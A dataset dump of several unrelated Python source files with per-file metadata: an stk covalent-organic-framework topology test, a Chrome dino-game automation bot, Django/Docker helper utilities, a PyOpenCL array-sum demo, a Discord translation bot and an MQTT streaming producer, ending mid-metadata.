valid_cof_dir): num_expected_bbs = { amine2_alt3: 6*9, aldehyde4_alt1: 3*9 } periodic_unreacted = { amine2_alt3: 0, aldehyde4_alt1: 0 } island_unreacted = { amine2_alt3: 11, aldehyde4_alt1: 11 } for i in range(4): for periodic in (True, False): cof = stk.ConstructedMolecule( building_blocks=[amine2_alt3, aldehyde4_alt1], topology_graph=stk.cof.Kagome( lattice_size=(3, 3, 1), vertex_alignments={ 0: i, len(stk.cof.Kagome.vertex_data)-1: i % 2 }, periodic=periodic ) ) kind = '_periodic' if periodic else '' cof.write( join(test_dir, f'aligning_{i}_{i%2}{kind}.mol') ) num_unreacted_fgs = ( periodic_unreacted if periodic else island_unreacted ) _test_construction( cof=cof, num_expected_bbs=num_expected_bbs, num_unreacted_fgs=num_unreacted_fgs, periodic=periodic ) _test_dump_and_load( test_dir=test_dir, mol=cof, name=f'aligning_{i}_{i%2}{kind}' ) _compare_with_valid( valid_dir=valid_cof_dir, mol=cof, name=f'aligning_{i}_{i%2}{kind}' ) def test_multi_bb( amine2, amine2_alt1, amine2_alt2, amine2_alt3, aldehyde4, aldehyde4_alt1, valid_cof_dir ): building_blocks = [ amine2, amine2_alt1, amine2_alt2, amine2_alt3, aldehyde4, aldehyde4_alt1 ] periodic_unreacted = {bb: 0 for bb in building_blocks} island_unreacted = { amine2: 0, amine2_alt1: 0, amine2_alt2: 3, amine2_alt3: 8, aldehyde4: 3, aldehyde4_alt1: 8 } for periodic in (True, False): kagome = stk.cof.Kagome((3, 3, 1), periodic) di_verts = [ v for v in kagome.vertices if v.get_num_edges() == 2 ] tetra_verts = [ v for v in kagome.vertices if v.get_num_edges() == 4 ] cof = stk.ConstructedMolecule( building_blocks=building_blocks, topology_graph=kagome, building_block_vertices={ amine2: di_verts[:4], amine2_alt1: di_verts[4:5], amine2_alt2: di_verts[5:7], amine2_alt3: di_verts[7:], aldehyde4: tetra_verts[:2], aldehyde4_alt1: tetra_verts[2:] } ) num_expected_bbs = { amine2: len(di_verts[:4]), amine2_alt1: len(di_verts[4:5]), amine2_alt2: len(di_verts[5:7]), amine2_alt3: len(di_verts[7:]), aldehyde4: len(tetra_verts[:2]), aldehyde4_alt1: len(tetra_verts[2:]) } kind = '_periodic' if periodic else '' cof.write(join(test_dir, f'multi_bb{kind}.mol')) num_unreacted_fgs = ( periodic_unreacted if periodic else island_unreacted ) _test_construction( cof=cof, num_expected_bbs=num_expected_bbs, num_unreacted_fgs=num_unreacted_fgs, periodic=periodic ) _test_dump_and_load(test_dir, cof, f'multi{kind}') _compare_with_valid(valid_cof_dir, cof, f'multi{kind}') def test_topologies( tmp_honeycomb, tmp_periodic_honeycomb, tmp_kagome, tmp_periodic_kagome, tmp_hexagonal, tmp_periodic_hexagonal, tmp_square, tmp_periodic_square, tmp_linkerless_honeycomb, tmp_periodic_linkerless_honeycomb, valid_cof_dir ): COFData = namedtuple( 'COFData', [ 'cof', 'num_linkers', 'num_building_blocks', 'num_unreacted_linker_fgs', 'num_unreacted_building_block_fgs', 'periodic' ] ) cofs = ( COFData(tmp_honeycomb, 3*9, 2*9, 6, 6, False), COFData(tmp_periodic_honeycomb, 3*9, 2*9, 0, 0, True), COFData(tmp_kagome, 6*9, 3*9, 11, 11, False), COFData(tmp_periodic_kagome, 6*9, 3*9, 0, 0, True), COFData(tmp_hexagonal, 12*9, 4*9, 23, 23, False), COFData(tmp_periodic_hexagonal, 12*9, 4*9, 0, 0, True), COFData(tmp_square, 2*9, 1*9, 6, 6, False), COFData(tmp_periodic_square, 2*9, 1*9, 0, 0, True), COFData(tmp_linkerless_honeycomb, 1*9, 1*9, 6, 6, False), COFData(tmp_periodic_linkerless_honeycomb, 9, 9, 0, 0, True) ) for cof in cofs: linker, building_block = sorted( cof.cof.get_building_blocks(), key=lambda bb: len(bb.func_groups) ) num_expected_bbs = { linker: cof.num_linkers, building_block: cof.num_building_blocks } num_unreacted_fgs = { linker: cof.num_unreacted_linker_fgs, building_block: cof.num_unreacted_building_block_fgs } _test_construction( cof=cof.cof, num_expected_bbs=num_expected_bbs, num_unreacted_fgs=num_unreacted_fgs, periodic=cof.periodic ) periodic = '_periodic' if cof.periodic else '' name = f'{cof.cof.topology_graph.__class__.__name__}{periodic}' _test_dump_and_load(test_dir, cof.cof, name) _compare_with_valid(valid_cof_dir, cof.cof, name)
null
tests/molecular/topology_graphs/test_cof_topologies.py
test_cof_topologies.py
py
10,920
python
en
code
null
code-starcoder2
83
[ { "api_name": "os.path.exists", "line_number": 11, "usage_type": "call" }, { "api_name": "os.path", "line_number": 11, "usage_type": "attribute" }, { "api_name": "os.mkdir", "line_number": 12, "usage_type": "call" }, { "api_name": "stk.normalize_vector", "line_number": 19, "usage_type": "call" }, { "api_name": "stk.normalize_vector", "line_number": 24, "usage_type": "call" }, { "api_name": "numpy.allclose", "line_number": 31, "usage_type": "call" }, { "api_name": "stk.vector_angle", "line_number": 56, "usage_type": "call" }, { "api_name": "stk.cof.Honeycomb", "line_number": 89, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 89, "usage_type": "attribute" }, { "api_name": "stk.cof.Hexagonal", "line_number": 90, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 90, "usage_type": "attribute" }, { "api_name": "stk.cof.Square", "line_number": 91, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 91, "usage_type": "attribute" }, { "api_name": "stk.cof.Kagome", "line_number": 92, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 92, "usage_type": "attribute" }, { "api_name": "stk.cof.LinkerlessHoneycomb", "line_number": 93, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 93, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 118, "usage_type": "call" }, { "api_name": "stk.ConstructedMolecule", "line_number": 190, "usage_type": "call" }, { "api_name": "stk.cof.Kagome", "line_number": 192, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 192, "usage_type": "attribute" }, { "api_name": "stk.cof", "line_number": 196, "usage_type": "attribute" }, { "api_name": "os.path.join", "line_number": 203, "usage_type": "call" }, { "api_name": "_test_utilities._test_dump_and_load", "line_number": 214, "usage_type": "call" }, { "api_name": "_test_utilities._compare_with_valid", "line_number": 219, "usage_type": "call" }, { "api_name": "stk.cof.Kagome", "line_number": 253, "usage_type": "call" }, { "api_name": "stk.cof", "line_number": 253, "usage_type": "attribute" }, { "api_name": "stk.ConstructedMolecule", "line_number": 260, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 281, "usage_type": "call" }, { "api_name": "_test_utilities._test_dump_and_load", "line_number": 291, "usage_type": "call" }, { "api_name": "_test_utilities._compare_with_valid", "line_number": 292, "usage_type": "call" }, { "api_name": "collections.namedtuple", "line_number": 309, "usage_type": "call" }, { "api_name": "_test_utilities._test_dump_and_load", "line_number": 354, "usage_type": "call" }, { "api_name": "_test_utilities._compare_with_valid", "line_number": 355, "usage_type": "call" } ]
446480223
from PIL import ImageGrab, ImageOps import pyautogui import time from numpy import * class Coordinates: replayBtn = (480, 238) dino = (246, 405) boxx = (255, 270) duckBox = (270, 231) # 1232 x to check # 431 lowest point to check def restartGame(): pyautogui.click(Coordinates.replayBtn) # pyautogui.keyDown('down') def duck(): pyautogui.keyDown('down') time.sleep(x) print("duck") pyautogui.keyUp('down') z = x - .3 x = z + 0 print(x) def pressSpace(): pyautogui.keyDown('space') time.sleep(x) print("Jump") time.sleep(0.1) pyautogui.keyUp('space') z = x - .3 x = z + 0 print(x) def imageGrab(): # box = (Coordinates.dino[0] + 74, Coordinates.dino[1], Coordinates.dino[0] + 100, Coordinates.dino[1]+30) box = (Coordinates.boxx[0], Coordinates.boxx[1], Coordinates.boxx[0]+75, Coordinates.boxx[1]+1) image = ImageGrab.grab(box) grayImage = ImageOps.grayscale(image) a = array(grayImage.getcolors()) return a.sum() def grab2(): dBox = (Coordinates.duckBox[0], Coordinates.duckBox[1], Coordinates.duckBox[0]+75, Coordinates.duckBox[1]+1) image2 = ImageGrab.grab(dBox) tGrey = ImageOps.grayscale(image2) b = array(tGrey.getcolors()) return b.sum() def main(): # button1() restartGame() x = 3 while True: if imageGrab() != 330: time.sleep(0) pressSpace() time.sleep(0) if grab2() != 330: time.sleep(0) duck() time.sleep(0) x = 6-x-.3 print(x) main()
null
dinobot.py
dinobot.py
py
1,627
python
en
code
null
code-starcoder2
83
[ { "api_name": "pyautogui.click", "line_number": 17, "usage_type": "call" }, { "api_name": "pyautogui.keyDown", "line_number": 22, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 23, "usage_type": "call" }, { "api_name": "pyautogui.keyUp", "line_number": 25, "usage_type": "call" }, { "api_name": "pyautogui.keyDown", "line_number": 32, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 33, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 35, "usage_type": "call" }, { "api_name": "pyautogui.keyUp", "line_number": 36, "usage_type": "call" }, { "api_name": "PIL.ImageGrab.grab", "line_number": 45, "usage_type": "call" }, { "api_name": "PIL.ImageGrab", "line_number": 45, "usage_type": "name" }, { "api_name": "PIL.ImageOps.grayscale", "line_number": 46, "usage_type": "call" }, { "api_name": "PIL.ImageOps", "line_number": 46, "usage_type": "name" }, { "api_name": "PIL.ImageGrab.grab", "line_number": 53, "usage_type": "call" }, { "api_name": "PIL.ImageGrab", "line_number": 53, "usage_type": "name" }, { "api_name": "PIL.ImageOps.grayscale", "line_number": 54, "usage_type": "call" }, { "api_name": "PIL.ImageOps", "line_number": 54, "usage_type": "name" }, { "api_name": "time.sleep", "line_number": 65, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 67, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 70, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 72, "usage_type": "call" } ]
211880163
import importlib import os import sys import typing as t from decimal import Decimal from functools import wraps from dpath.util import get from yaml import dump as dump_yaml SHRED_DATA_FIELD_NAMES = ( 'password', 'secret', 'pass', 'pwd', 'key', 'token', 'auth', 'cred', ) def shred(key_name: str, value): key_name = key_name.lower() need_shred = False for data_field_name in SHRED_DATA_FIELD_NAMES: if data_field_name in key_name: need_shred = True break if not need_shred: return value return '*' * len(str(value)) def import_from(module: str, name: str): return getattr( importlib.import_module(module, [name]), name ) def dot_path(obj, path: str, default=None): """ Access elements of mixed dict/object by path. :param obj: object or dict :param path: path to value :param default: default value if chain resolve failed :return: value """ path_items = path.split('.') val = obj sentinel = object() for item in path_items: if isinstance(val, dict): val = val.get(item, sentinel) if val is sentinel: return default else: val = getattr(val, item, sentinel) if val is sentinel: return default return val def dotkey(obj: dict, path: str, default=None, separator='.'): """ :param obj: dict like {'some': {'value': 3}} :param path: 'some.value' :param separator: '.' | '/' :param default: default for KeyError :return: value or default value """ try: return get(obj, path, separator=separator) except KeyError: return default def _materialize_dict(d: t.Dict, separator: str = '.'): """ Traverses and transforms a given dict into a tuples of key paths and values. :param d: a dict to traverse :param separator: build paths with given separator :return: yields tuple(materialized_path, value) >>> list(_materialize_dict({'test': {'path': 1}, 'key': 'val'}, '.')) >>> [('key', 'val'), ('test.path', 1)] """ if not hasattr(d, 'items'): raise ValueError('Cannot materialize an object with no `items()`: %s' % repr(d)) for path_prefix, v in d.items(): if not isinstance(v, dict): yield str(path_prefix), v continue for nested_path, nested_val in _materialize_dict(v, separator=separator): yield '{0}{1}{2}'.format(path_prefix, separator, nested_path), nested_val def materialize_dict(d: dict, separator: str = '.') -> t.List[t.Tuple[str, t.Any]]: """ Transforms a given dict into a sorted list of tuples of key paths and values. :param d: a dict to materialize :param separator: build paths with given separator :return: a depth descending and alphabetically ascending sorted list (-deep, asc), longest first >>> sample = { >>> 'a': 1, >>> 'aa': 1, >>> 'b': { >>> 'c': 1, >>> 'b': 1, >>> 'a': 1, >>> 'aa': 1, >>> 'aaa': { >>> 'a': 1 >>> } >>> } >>> } >>> materialize_dict(sample, '/') >>> [ >>> ('b/aaa/a', 1), >>> ('b/a', 1), >>> ('b/aa', 1), >>> ('b/b', 1), >>> ('b/c', 1), >>> ('a', 1), >>> ('aa', 1) >>> ] """ def _matkeysort(tup: t.Tuple[str, t.Any]): return len(tup[0].split(separator)) s1 = sorted(_materialize_dict(d, separator=separator), key=lambda x: x[0]) return sorted(s1, key=_matkeysort, reverse=True) def mp_serialize_dict( d: dict, separator: str = '.', serialize: t.Optional[t.Callable] = dump_yaml, value_prefix: str = '::YAML::\n') -> t.List[t.Tuple[str, bytes]]: """ :param d: dict to materialize :param separator: build paths with given separator :param serialize: method to serialize non-basic types, default is yaml.dump :param value_prefix: prefix for non-basic serialized types :return: list of tuples (mat_path, b'value') """ md = materialize_dict(d, separator=separator) res = [] for path, value in md: # have to serialize values (value should be None or a string / binary data) if value is None: pass elif isinstance(value, str) and value != '': # check for value != '' used to armor empty string with forced serialization # since it can be not recognized by a storage backend pass elif isinstance(value, bytes): pass elif isinstance(value, bool): value = str(value).lower() elif isinstance(value, (int, float, Decimal)): value = str(value) else: value = (value_prefix + serialize(value)) if isinstance(value, str): value = value.encode() res.append((path, value)) return res def wf(raw_str, flush=True, prevent_completion_polluting=True): """ :param raw_str: Raw string to print. :param flush: execute sys.stdout.flush :param prevent_completion_polluting: don't print anything :return: """ if prevent_completion_polluting and len(sys.argv) <= 1: return sys.stdout.write(raw_str) flush and sys.stdout.flush() def coerce_str_to_bool(val: t.Union[str, int, bool, None], strict: bool = False) -> bool: """ :param val: ['', 0, 1, true, false, True, False] :param strict: raise Exception if got anything except ['', 0, 1, true, false, True, False] :return: True | False """ if isinstance(val, bool): return val # flag is set if val == '': return True val = str(val).lower() if val in ['0', '1']: return bool(int(val)) if val == 'true': return True if val == 'false': return False if strict: raise ValueError('Unsupported value for boolean flag: `%s`' % val) return bool(val) def env_bool_flag(flag_name: str, strict: bool = False, env: t.Dict = os.environ) -> bool: """ Environment boolean checker. Empty string (presence in env) is treat as True. :param flag_name: 'dockerized' :param strict: raise Exception if got anything except ['', 0, 1, true, false] :param env: dict-alike object, ``os.environ`` by default :return: True | False """ sentinel = object() val = env.get(flag_name, sentinel) if val is sentinel: return False return coerce_str_to_bool(val, strict=strict) def run_env_once(f): """ ENV variables used to prevent running init code twice for manage.py command (https://stackoverflow.com/questions/16546652/why-does-django-run-everything-twice) """ @wraps(f) def wrapper(*args, **kwargs): has_run = os.environ.get(wrapper.__name__) if has_run == '1': return result = f(*args, **kwargs) os.environ[wrapper.__name__] = '1' return result return wrapper def is_dockerized(flag_name: str = 'DOCKERIZED', strict: bool = False): return env_bool_flag(flag_name, strict=strict) def is_production(flag_name: str = 'PRODUCTION', strict: bool = False): return env_bool_flag(flag_name, strict=strict)
null
django_docker_helpers/utils.py
utils.py
py
7,366
python
en
code
null
code-starcoder2
83
[ { "api_name": "importlib.import_module", "line_number": 39, "usage_type": "call" }, { "api_name": "dpath.util.get", "line_number": 76, "usage_type": "call" }, { "api_name": "typing.Dict", "line_number": 81, "usage_type": "attribute" }, { "api_name": "typing.Tuple", "line_number": 135, "usage_type": "attribute" }, { "api_name": "typing.Any", "line_number": 135, "usage_type": "attribute" }, { "api_name": "typing.List", "line_number": 103, "usage_type": "attribute" }, { "api_name": "typing.Tuple", "line_number": 103, "usage_type": "attribute" }, { "api_name": "typing.Any", "line_number": 103, "usage_type": "attribute" }, { "api_name": "typing.Optional", "line_number": 145, "usage_type": "attribute" }, { "api_name": "typing.Callable", "line_number": 145, "usage_type": "attribute" }, { "api_name": "yaml.dump", "line_number": 145, "usage_type": "name" }, { "api_name": "decimal.Decimal", "line_number": 169, "usage_type": "name" }, { "api_name": "typing.List", "line_number": 146, "usage_type": "attribute" }, { "api_name": "typing.Tuple", "line_number": 146, "usage_type": "attribute" }, { "api_name": "sys.argv", "line_number": 189, "usage_type": "attribute" }, { "api_name": "sys.stdout.write", "line_number": 192, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 192, "usage_type": "attribute" }, { "api_name": "sys.stdout.flush", "line_number": 193, "usage_type": "call" }, { "api_name": "sys.stdout", "line_number": 193, "usage_type": "attribute" }, { "api_name": "typing.Union", "line_number": 196, "usage_type": "attribute" }, { "api_name": "typing.Dict", "line_number": 226, "usage_type": "attribute" }, { "api_name": "os.environ", "line_number": 226, "usage_type": "attribute" }, { "api_name": "os.environ.get", "line_number": 252, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 252, "usage_type": "attribute" }, { "api_name": "os.environ", "line_number": 256, "usage_type": "attribute" }, { "api_name": "functools.wraps", "line_number": 250, "usage_type": "call" } ]
161834532
# Use OpenCL To Add Two Random Arrays import pyopencl as cl # Import the OpenCL GPU computing API import numpy # Import Numpy number tools context = cl.create_some_context() # Initialize the Context queue = cl.CommandQueue(context) # Instantiate a Queue a = numpy.random.rand(50000).astype(numpy.float32) # Create a random numpy array b = numpy.random.rand(50000).astype(numpy.float32) # Create a random numpy array c = numpy.empty_like(a) # Create an empty destination array a_buffer = cl.Buffer(context, cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR, hostbuf=a) b_buffer = cl.Buffer(context, cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR, hostbuf=b) c_buffer = cl.Buffer(context, cl.mem_flags.WRITE_ONLY, b.nbytes) # Create three buffers (plans for areas of memory on the device) kernel = """__kernel void sum(__global float* a, __global float* b, __global float* c) { int i = get_global_id(0); c[i] = a[i] + b[i]; }""" # Create a kernel (a string containing C-like OpenCL device code) program = cl.Program(context, kernel).build() # Compile the kernel code into an executable OpenCL program program.sum(queue, a.shape, a_buffer, b_buffer, c_buffer) # Enqueue the program for execution, causing data to be copied to the device # - queue: the command queue the program will be sent to # - a.shape: a tuple of the arrays' dimensions # - a.buffer, b.buffer, c.buffer: the memory spaces this program deals with cl.enqueue_read_buffer(queue, c_buffer, c).wait() # Copy the data for array c back to the host print("a: {}".format(a)) print("b: {}".format(b)) print("c: {}".format(c)) # Print all three host arrays, to show sum() worked
null
020_array_sum.py
020_array_sum.py
py
1,672
python
en
code
null
code-starcoder2
83
[ { "api_name": "pyopencl.create_some_context", "line_number": 6, "usage_type": "call" }, { "api_name": "pyopencl.CommandQueue", "line_number": 7, "usage_type": "call" }, { "api_name": "numpy.random.rand", "line_number": 9, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 9, "usage_type": "attribute" }, { "api_name": "numpy.float32", "line_number": 9, "usage_type": "attribute" }, { "api_name": "numpy.random.rand", "line_number": 10, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 10, "usage_type": "attribute" }, { "api_name": "numpy.float32", "line_number": 10, "usage_type": "attribute" }, { "api_name": "numpy.empty_like", "line_number": 11, "usage_type": "call" }, { "api_name": "pyopencl.Buffer", "line_number": 13, "usage_type": "call" }, { "api_name": "pyopencl.mem_flags", "line_number": 13, "usage_type": "attribute" }, { "api_name": "pyopencl.Buffer", "line_number": 14, "usage_type": "call" }, { "api_name": "pyopencl.mem_flags", "line_number": 14, "usage_type": "attribute" }, { "api_name": "pyopencl.Buffer", "line_number": 15, "usage_type": "call" }, { "api_name": "pyopencl.mem_flags", "line_number": 15, "usage_type": "attribute" }, { "api_name": "pyopencl.Program", "line_number": 24, "usage_type": "call" }, { "api_name": "pyopencl.enqueue_read_buffer", "line_number": 33, "usage_type": "call" } ]
111753528
#duckHacks 2019 Submission by Matthew De La Paz, Eugene Kozlakov, and David Carpenter #Team Name: "Threat Level Onyx" ## Imports from config import TOKEN from googletrans import Translator import googletrans import ast import discord from discord.ext import commands from discord.ext.commands import has_permissions ## bot = commands.Bot(command_prefix='&') translator = Translator(); ## Taken from the bot page debug = True def save_settings(settings_dict): ''' Write all settings to a text file 'settings.txt' in the same format as load_settings ''' s = open("settings.txt", "r") str_settings = str(settings_dict) dict_list = [] for line in s: try: dictionary = ast.literal_eval(line) if dictionary["server_id"] != settings_dict["server_id"]: dict_list.append(str(dictionary)) except: pass s.close() lines = '\n'.join(dict_list) settings = open("settings.txt", "w") for line in lines: settings.write(line) settings.write("\n" + str_settings) settings.close() def load_settings(server_id): ''' Read all settings from 'settings.txt'. settings are in the following format: { server_id : num, ID of the server realtime : boolean, If the bot should translate in realtime language : string, Language code of the default language of the server confidence : num Number between 0 and 1, defaults to .5 } ''' settings = open("settings.txt", "r") dict_list = [] #will contain dictionaries for each server's settings for line in settings: try: dict_list.append(ast.literal_eval(line)) except: print("Error in appending dictionary/converting string to dict") settings.close() #contains the defaut settings default_dict = {"server_id":server_id,"realtime":True,"language":"en","confidence":.5} for dictionary in dict_list: if server_id in dictionary.values(): return dictionary f = open("settings.txt","a") f.write("\n"+str(default_dict)) f.close() return default_dict @bot.event async def on_ready(): print("I'm in") print(bot.user) await bot.change_presence(game=discord.Game(name="Type '&help' for commands")) print(list(bot.servers)[0].id) @bot.event async def on_message(message): if message.content[0] != '&': settings = load_settings(message.server.id) if not message.author.bot and is_not_target_language(settings["language"], settings["confidence"], message.content) and settings["realtime"]: #if the user has a nickname, user it. if not, user their username minus the last 5 characters if message.author.nick != None : await bot.send_message(message.channel, str(message.author.nick) + " said:") else: user_name = str(message.author) user_length = len(user_name) await bot.send_message(message.channel, user_name[:user_length-5] + " said:") # Translated message could be over 2000 characters. This code allows the message to be sent in that case # If it is over 2000 characters, sends two messages, with the first 2000 characters and then the rest print(settings["language"]) transed_msg = translator.translate(message.content.lower(), dest=settings["language"]).text if (len(transed_msg) > 2000): await bot.send_message(message.channel, transed_msg[:2000]) await bot.send_message(message.channel, transed_msg[2000:]) else: await bot.send_message(message.channel, transed_msg) # Because we want commands AND on_message, this line is neccessary await bot.process_commands(message) #!sl <language> command #determine user permissions #determine if the language is valid #write it to the text file #set variable for language @bot.command(name= "sl",pass_context=True) async def _sl(ctx,in_lang): """ Sets server language This command sets the server-wide language. This is the language that anything written on the server will be translated into. """ settings = load_settings(ctx.message.server.id) is_admin = ctx.message.author.server_permissions.administrator in_lang = in_lang.lower() if is_admin: if in_lang in list(googletrans.LANGUAGES.keys()): in_lang = googletrans.LANGUAGES[in_lang] await bot.say("Language has been set to " + in_lang + "!") settings["language"] = googletrans.LANGCODES[in_lang] save_settings(settings) elif in_lang in list(googletrans.LANGCODES.keys()): await bot.say("Language has been set to " + in_lang + "!") settings["language"] = googletrans.LANGCODES[in_lang] save_settings(settings) else: await bot.say("Invalid language, please use \"&list\" command for a list of valid languages and codes.") else: await bot.say("Sorry, you don't have the permissions!") #!sc <language> command #determine user permissions #determine if the tr is valid #write it to the text file #set variable for language @bot.command(name= "list", pass_context=True) async def _list(ctx): """ Lists valid languages and codes. """ pretty_languages = "" for key in googletrans.LANGCODES.keys(): pretty_languages = pretty_languages + googletrans.LANGCODES[key]+ "\t"+ key + "\n" print(pretty_languages) await bot.say("List of valid languages:\n" + pretty_languages) @bot.command(name = "language",pass_context=True) async def _language(cxt): """ Displays current language of server/channel. """ server_lang = load_settings(cxt.message.server.id)["language"] await bot.say("The current language is set to " + googletrans.LANGUAGES[server_lang] + ".") @bot.command(name = "at") #autotranslate async def _at(out_lang,*args): """ Detects <src> language and translates to <src> language. format: &at <dest_language_code> <text> """ dest = out_lang to_trans = "" for i in range(0,len(args)): to_trans += args[i] + " " await bot.say(translator.translate(to_trans,dest).text) @bot.command(name = "mt") #manual translate async def _mt(in_lang,out_lang,*args): """ Translates given text from <src> to <dest> language. NOTE: Does not detect languages whatsoever! Be carefule with what you input as your <src>! format: &mt <source language> <destination language> <text> """ src = in_lang dest = out_lang to_trans = "" for i in range(0,len(args)): to_trans += args[i] + " " await bot.say(translator.translate(to_trans,dest,src).text) @bot.command(name = "realtime",pass_context=True) async def _realtime(ctx, arg): ''' Turns realtime translate on/off given on or off. ''' is_admin = ctx.message.author.server_permissions.administrator if is_admin: settings = load_settings(ctx.message.server.id) if arg.lower() in ["true","on"]: realtime = True settings["realtime"] = True elif arg.lower() in ["false","off"]: realtime = False settings["realtime"] = False else: await bot.say("Please use on/true or off/false.") status = "on" if realtime else "off" await bot.say("Real-time translation currently " + status + ".") save_settings(settings) else: await bot.say("Sorry, you don't have permissions for that.") @bot.command(name = "sc",pass_context=True) async def _sc(ctx, percent): ''' Sets the acceptable confidence level. Sets the accepted confidence level between 0 and 1 that Langwave must be before it will present the translated message. Default is 0.5. ''' is_admin = ctx.message.author.server_permissions.administrator if is_admin: settings = load_settings(ctx.message.server.id) percent = float(percent) if percent > 1 or percent < 0: await bot.say("Please enter a number between 0 and 1. (e.g. 0.5)") else: confidence_threshold = str(percent) await bot.say("The accepted confidence level is now " + confidence_threshold) settings["confidence"] = percent save_settings(settings) else: await bot.say("Sorry, you don't have permissions for that.") ''' TODO: //done &help command - display commands // DONE //done &put !help in the "playing" field //DONE //done &list - list languages //DONE //done &sl <language> - set server language //DONE //done &language - display what language the server is set to //DONE &realtime <true/false> - enable realtime translating to the server-set language //done &translate / !t <in-language> <out-language> <text> - translates text from one language to another //DONE //done &autotranslate / !at <out-language> <text> - detects language of text and translates it to out-language. with no out-language it defaults to server language //DONE &st <1 >= number >= 0> - Sets the confidence threshold, default is .5 ''' def is_not_target_language(target, confidence_threshold, message): ''' Given the server-wide chosen language and a user message, returns whether or not googletrans *thinks* the language is in the target language. ''' detection = translator.detect(message) #detection object from googletrans message_lang = str(detection.lang) #language member, two-letter string denoting language confidence = detection.confidence #confidence level denoting the percent chance that the user's message was detected correctly print(message_lang, confidence) return (confidence > confidence_threshold) and (message_lang != target) bot.run(TOKEN)
null
main.py
main.py
py
10,053
python
en
code
null
code-starcoder2
83
[ { "api_name": "discord.ext.commands.Bot", "line_number": 15, "usage_type": "call" }, { "api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name" }, { "api_name": "googletrans.Translator", "line_number": 17, "usage_type": "call" }, { "api_name": "ast.literal_eval", "line_number": 33, "usage_type": "call" }, { "api_name": "ast.literal_eval", "line_number": 66, "usage_type": "call" }, { "api_name": "discord.Game", "line_number": 85, "usage_type": "call" }, { "api_name": "googletrans.LANGUAGES.keys", "line_number": 129, "usage_type": "call" }, { "api_name": "googletrans.LANGUAGES", "line_number": 129, "usage_type": "attribute" }, { "api_name": "googletrans.LANGUAGES", "line_number": 130, "usage_type": "attribute" }, { "api_name": "googletrans.LANGCODES", "line_number": 132, "usage_type": "attribute" }, { "api_name": "googletrans.LANGCODES.keys", "line_number": 134, "usage_type": "call" }, { "api_name": "googletrans.LANGCODES", "line_number": 134, "usage_type": "attribute" }, { "api_name": "googletrans.LANGCODES", "line_number": 136, "usage_type": "attribute" }, { "api_name": "googletrans.LANGCODES.keys", "line_number": 155, "usage_type": "call" }, { "api_name": "googletrans.LANGCODES", "line_number": 155, "usage_type": "attribute" }, { "api_name": "googletrans.LANGCODES", "line_number": 156, "usage_type": "attribute" }, { "api_name": "googletrans.LANGUAGES", "line_number": 168, "usage_type": "attribute" }, { "api_name": "config.TOKEN", "line_number": 266, "usage_type": "argument" } ]
608017954
''' Created on Oct 30, 2017 @author: matti ''' import bclab import logging import time import numpy as np import base64 import threading import sys class StreamA(bclab.Producer, threading.Thread): def __init__(self, logger, broker_address, broker_port, client_id, n_channels=50, rows_per_message=200, qos=1): bclab.Producer.__init__(self,logger, broker_address, broker_port, client_id, qos=qos) threading.Thread.__init__(self) self.total_rows_sent = 0 self.n_channels=n_channels self.fq_adj= np.random.randint(50,300,n_channels) self.rows_per_message=rows_per_message self.daemon=True self.start() def on_arm(self, attr): chs =[] for i in range(self.n_channels): ch = bclab.DataChannel("channel %i" % i, i, -1, 1, "stream1") chs.append(ch) self.initialize_data(2000, len(chs), chs) def run(self): nxt= time.perf_counter()+1 iv = 0.1 while(True): status = self.get_status() if status in [bclab.STATUS_ARMED, bclab.STATUS_TRIGGERED]: bbuf = np.zeros((self.rows_per_message, self.n_channels), np.float32) for i in range(0,self.n_channels): c=0.8*np.sin(np.arange(self.total_rows_sent,self.total_rows_sent+self.rows_per_message)/self.fq_adj[i])+np.random.rand(self.rows_per_message)*0.2 bbuf[:,i]=c s = base64.b64encode(bbuf).decode("utf-8") self.stream_data(s, self.total_rows_sent, self.rows_per_message) self.total_rows_sent += self.rows_per_message now = time.perf_counter() d = nxt-now nxt += iv if (d>0): time.sleep(d) if __name__ == '__main__': logging.getLogger().setLevel(logging.INFO) logging.info('running') qos = int(sys.argv[1]) if len(sys.argv) > 1 else 1 rows_to_send = int(sys.argv[2]) if len(sys.argv) > 2 else 20000 with StreamA(logging, 'localhost', 1883, "streama", 50, 200, qos ) as producer: while(producer.total_rows_sent < rows_to_send): time.sleep(0.5) logging.info('done')
null
py/streama.py
streama.py
py
2,245
python
en
code
null
code-starcoder2
83
[ { "api_name": "bclab.Producer", "line_number": 15, "usage_type": "attribute" }, { "api_name": "threading.Thread", "line_number": 15, "usage_type": "attribute" }, { "api_name": "bclab.Producer.__init__", "line_number": 17, "usage_type": "call" }, { "api_name": "bclab.Producer", "line_number": 17, "usage_type": "attribute" }, { "api_name": "threading.Thread.__init__", "line_number": 18, "usage_type": "call" }, { "api_name": "threading.Thread", "line_number": 18, "usage_type": "attribute" }, { "api_name": "numpy.random.randint", "line_number": 21, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 21, "usage_type": "attribute" }, { "api_name": "bclab.DataChannel", "line_number": 29, "usage_type": "call" }, { "api_name": "time.perf_counter", "line_number": 34, "usage_type": "call" }, { "api_name": "bclab.STATUS_ARMED", "line_number": 39, "usage_type": "attribute" }, { "api_name": "bclab.STATUS_TRIGGERED", "line_number": 39, "usage_type": "attribute" }, { "api_name": "numpy.zeros", "line_number": 40, "usage_type": "call" }, { "api_name": "numpy.float32", "line_number": 40, "usage_type": "attribute" }, { "api_name": "numpy.sin", "line_number": 42, "usage_type": "call" }, { "api_name": "numpy.arange", "line_number": 42, "usage_type": 